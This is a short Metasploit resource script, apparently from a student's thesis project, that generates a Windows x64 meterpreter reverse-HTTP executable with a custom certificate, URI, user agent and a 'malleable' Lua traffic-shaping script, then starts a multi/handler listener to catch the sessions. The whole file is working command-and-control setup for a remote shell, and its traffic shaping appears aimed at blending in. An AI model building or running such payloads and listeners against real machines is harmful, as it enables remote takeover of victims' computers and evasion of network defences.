setg LogLevel 3
setg LHOST 192.168.42.131
setg HandlerSSLCert "/home/timo/Projects/bachelor/certs/malleable_cert.pem"

setg AutoLoadStdapi true

use payload/windows/x64/meterpreter_reverse_http

setg OverrideRequestHost true
setg OverrideScheme httpm
setg luri mysuperduperpath
setg httpuseragent aaa

setg malleablescriptpath /home/timo/Projects/bachelor/lua-testing/unit-tests/luaunit/timoTests/scripts/meterpreter_malleable.lua

set LPORT 80



generate -f exe -o /mnt/hgfs/Shared_Folder/bachelor/meterpreter_out/meterpreter.exe

use multi/handler
set ExitOnSession false

set payload windows/x64/meterpreter_reverse_http

set LPORT 5555
run -j

jobs -v
